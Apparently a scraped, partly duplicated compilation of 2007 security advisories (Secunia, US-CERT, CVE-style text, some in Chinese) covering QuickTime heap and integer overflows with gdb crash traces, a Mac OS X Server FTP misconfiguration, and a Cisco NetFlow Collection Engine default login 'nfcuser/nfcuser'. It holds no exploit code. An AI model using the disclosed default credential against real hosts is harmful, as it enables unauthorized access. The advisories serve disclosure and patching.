Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Apple Security Update 2007-004 uses an incorrect configuration file for FTPServer in Apple Mac OS X Server 10.4.9, which might allow remote authenticated users to access additional directories. Mac OS X Server is prone to a remote security vulnerability

Cisco Network Services (CNS) NetFlow Collection Engine (NFC) before 6.0 has an nfcuser account with the default password nfcuser, which allows remote attackers to modify the product configuration and, when installed on Linux, obtain login access to the host operating system. A vulnerability in the Cisco NetFlow Collection Engine could allow a remote attacker to gain access to a vulnerable system. This issue stems from a design flaw that makes an insecure account available to remote users. Versions of Cisco NFC prior to 6.0 are vulnerable to this issue. Cisco is tracking this issue as Cisco Bug ID CSCsh75038. When NFC is installed, a default user account will be created and a corresponding password will be set. NFC is installed on a supported UNIX platform. During the installation process, a default web-based user account nfcuser is created, which is used to perform application maintenance, configuration, and troubleshooting with the password nfcuser. Before version 6.0, the Linux installation program will also create a local user named nfcuser on the operating system, and the default password is exactly the same as the user name. If the account already exists, the Linux installer will change the password to be the same as the username

Heap-based buffer overflow in the JVTCompEncodeFrame function in Apple Quicktime 7.1.5 and other versions before 7.2 allows remote attackers to execute arbitrary code via a crafted H.264 MOV file. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime是一款流行的多媒体播放器，支持多种媒体格式. QuickTime在处理畸形格式的MOV文件时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户机器. 如果使用QuickTime加载了畸形的.mov文件的话，JVTCompEncodeFrame()函数可能无法正确地解析畸形数据，触发堆溢出，播放器会由于分段错误而停止响应，或以登录用户的权限执行任意指令. 调试信息如下： Program received signal EXC_BAD_ACCESS, Could not access memory. Reason： KERN_PROTECTION_FAILURE at address： 0x00041656 0x90003646 in szone_malloc () (gdb) bt ＃0 0x90003646 in szone_malloc () ＃1 0x90003527 in malloc_zone_malloc () ＃2 0x90325591 in mem_heap_malloc () ＃3 0x90325511 in shape_alloc_bounds () ＃4 0x9170d8ec in RectRgn () ＃5 0x91726437 in SetRectRgn () ＃6 0x9436d3b4 in ICMDeviceLoop () ＃7 0x9437728a in DecompressSequenceFrameWhen () ＃8 0x94376c3a in ICMDecompressionSessionDecodeFrame () ＃9 0x98b0c58c in v2m_rDecompressSequenceFrameWhen () ＃10 0x98b1333b in v2m_decompressVideoFrame () ＃11 0x98b13cd7 in QueueAFrame () ＃12 0x98b14d49 in v2m_doWhatTheMentorTellsUs () ＃13 0x98b166ac in Video2MoviesTask () ＃14 0x90cceccf in CallComponentFunctionCommon () ＃15 0x98b056c0 in Video2ComponentDispatch () ＃16 0x90cce7f8 in CallComponentDispatch () ＃17 0x94369f27 in MediaMoviesTask () ＃18 0x94368c04 in TaskMovie_priv () ＃19 0x98bb9b42 in doIdleMovie () ＃20 0x98bc8691 in internalDoAction () ＃21 0x98bb9a1a in _MCIdle () ＃22 0x90cceb13 in CallComponentFunctionCommon () ＃23 0x98bb4f19 in _MCComponentDispatch () ＃24 0x90cce7f8 in CallComponentDispatch () ＃25 0x943679fc in MCIdle () ＃26 0x9436664d in QTOMovieObject：：SendCommand () ＃27 0x9433b1e2 in DispatchQTMsg () ＃28 0x9433af0f in QTObjectTokenPriv：：SendMessageToObject () ＃29 0x9433a338 in QTObjectTokenPriv：：DispatchMessage () ＃30 0x9436646a in QTSendToObject () ＃31 0x95a21142 in QTObjectTokenExecuteCommand () ＃32 0x95a32f85 in -[QTMovie idle] () ＃33 0x9082a6eb in CFSetApplyFunction () ＃34 0x95a2feab in +[QTMovie idleAllMovies：] () ＃35 0x9282c2de in __NSFireTimer () ＃36 0x9082c7e2 in CFRunLoopRunSpecific () ＃37 0x9082bace in CFRunLoopRunInMode () ＃38 0x92dd78d8 in RunCurrentEventLoopInMode () ＃39 0x92dd6fe2 in ReceiveNextEventCommon () ＃40 0x92dd6e39 in BlockUntilNextEventMatchingListInMode () ＃41 0x9327d465 in _DPSNextEvent () ＃42 0x9327d056 in -[NSApplication nextEventMatchingMask：untilDate：inMode：dequeue：] () ＃43 0x93276ddb in -[NSApplication run] () ＃44 0x9326ad2f in NSApplicationMain () ＃45 0x00040632 in _start () ＃46 0x0004054d in start () (gdb). Failed exploit attempts likely result in denial-of-service conditions. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. Remote attackers may take advantage of this vulnerability to control the user's machine. If a malformed .mov file is loaded using QuickTime, the JVTCompEncodeFrame() function may not parse the malformed data correctly, trigger a heap overflow, the player may stop responding due to a segmentation fault, or execute arbitrary commands with the privileges of the logged-in user. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/ The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA26034 VERIFY ADVISORY: http://secunia.com/advisories/26034/ CRITICAL: Highly critical IMPACT: Exposure of sensitive information, DoS, System access WHERE: >From remote REVISION: 1.1 originally posted 2007-07-12 SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/ DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An unspecified error exists in the processing of H.264 movies. This can be exploited to cause memory corruption and may allow execution of arbitrary code when a user accesses a specially crafted H.264 movie. 2) An unspecified error exists in the processing of movie files. 4) An integer overflow error exists in the handling of the "author" and "title" fields when parsing SMIL files. 5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet. 6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory. This can lead to execution of arbitrary code when a user visits a web site containing a specially crafted Java applet. 7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. 8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet. The vulnerabilities are reported in versions prior to 7.2. SOLUTION: Update to version 7.2. QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc. 2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software. 3) The vendor credits Tom Ferris, Security-Protocols.com. 4) David Vaartjes of ITsec Security Services, reported via iDefense. 5, 6, 7) The vendor credits Adam Gowdiak. 8) Reported by the vendor. CHANGELOG: 2007-07-12: Added link to US-CERT. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556 OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-193A Apple Releases Security Updates for QuickTime Original release date: July 12, 2007 Last revised: -- Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows Overview Apple QuickTime contains multiple vulnerabilities. I. Description Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page. Note that QuickTime ships with Apple iTunes. For more information, please refer to the Vulnerability Notes Database. II. For further information, please see the Vulnerability Notes Database. III. Solution Upgrade QuickTime Upgrade to QuickTime 7.2. This and other updates for Mac OS X are available via Apple Update. On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document. References * Vulnerability Notes for QuickTime 7.2 - <http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72> * About the security content of the QuickTime 7.2 Update - <http://docs.info.apple.com/article.html?artnum=305947> * How to tell if Software Update for Windows is working correctly when no updates are available - <http://docs.info.apple.com/article.html?artnum=304263> * Apple QuickTime 7.2 for Windows - <http://www.apple.com/support/downloads/quicktime72forwindows.html> * Apple QuickTime 7.2 for Mac - <http://www.apple.com/support/downloads/quicktime72formac.html> * Standalone Apple QuickTime Player - <http://www.apple.com/quicktime/download/standalone.html> * Mac OS X: Updating your software - <http://docs.info.apple.com/article.html?artnum=106704> * Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-193A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Thursday July 12, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr 4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV 8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ +ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8 a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ== =EV1X -----END PGP SIGNATURE-----

Integer overflow in the FlipFileTypeAtom_BtoN function in Apple Quicktime 7.1.5, and other versions before 7.2, allows remote attackers to execute arbitrary code via a crafted M4V (MP4) file. Apple QuickTime fails to properly handle malformed movie files. Failed exploit attempts likely result in denial-of-service conditions. Apple QuickTime is a popular multimedia player that supports a wide variety of media formats. A vulnerability exists in QuickTime's handling of MP4 files containing malformed data. Attackers may exploit this vulnerability to gain control of users' machines by tricking them into processing malicious MP4 files. The debugging information is as follows: Reason: KERN_PROTECTION_FAILURE at address: 0x00458000 0x9431cc63 in FlipFileTypeAtom_BtoN () (gdb) bt #0 0x9431cc63 in FlipFileTypeAtom_BtoN () #1 0x9431c208 in PrivateNewMovieFromDataFork_priv () #2 0x9431b04a in NewMovieFromFilePriv () #3 0x943177d5 in NewMovieFromDataRefPriv_priv () #4 0x943164b2 in NewMovieFromProperties_priv () #5 0x95a24920 in -[QTMovie initWithAttributes:error:] () #6 0x95a22f31 in +[QTMovie movieWithAttributes:error:] () #7 0x0000adb7 in -[QTPMovieDocument:File]Type readFrom:. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/ The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA26034 VERIFY ADVISORY: http://secunia.com/advisories/26034/ CRITICAL: Highly critical IMPACT: Exposure of sensitive information, DoS, System access WHERE: >From remote REVISION: 1.1 originally posted 2007-07-12 SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/ DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An unspecified error exists in the processing of H.264 movies. This can be exploited to cause memory corruption and may allow execution of arbitrary code when a user accesses a specially crafted H.264 movie. 2) An unspecified error exists in the processing of movie files. 4) An integer overflow error exists in the handling of the "author" and "title" fields when parsing SMIL files. 5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet. 6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory. This can lead to execution of arbitrary code when a user visits a web site containing a specially crafted Java applet. 7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. 8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet. The vulnerabilities are reported in versions prior to 7.2. SOLUTION: Update to version 7.2. QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc. 2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software. 3) The vendor credits Tom Ferris, Security-Protocols.com. 4) David Vaartjes of ITsec Security Services, reported via iDefense. 5, 6, 7) The vendor credits Adam Gowdiak. 8) Reported by the vendor. CHANGELOG: 2007-07-12: Added link to US-CERT. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556 OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-193A Apple Releases Security Updates for QuickTime Original release date: July 12, 2007 Last revised: -- Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows Overview Apple QuickTime contains multiple vulnerabilities. I. Description Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page. Note that QuickTime ships with Apple iTunes. For more information, please refer to the Vulnerability Notes Database. II. For further information, please see the Vulnerability Notes Database. III. Solution Upgrade QuickTime Upgrade to QuickTime 7.2. This and other updates for Mac OS X are available via Apple Update. On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document. References * Vulnerability Notes for QuickTime 7.2 - <http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72> * About the security content of the QuickTime 7.2 Update - <http://docs.info.apple.com/article.html?artnum=305947> * How to tell if Software Update for Windows is working correctly when no updates are available - <http://docs.info.apple.com/article.html?artnum=304263> * Apple QuickTime 7.2 for Windows - <http://www.apple.com/support/downloads/quicktime72forwindows.html> * Apple QuickTime 7.2 for Mac - <http://www.apple.com/support/downloads/quicktime72formac.html> * Standalone Apple QuickTime Player - <http://www.apple.com/quicktime/download/standalone.html> * Mac OS X: Updating your software - <http://docs.info.apple.com/article.html?artnum=106704> * Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-193A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Thursday July 12, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr 4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV 8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ +ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8 a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ== =EV1X -----END PGP SIGNATURE-----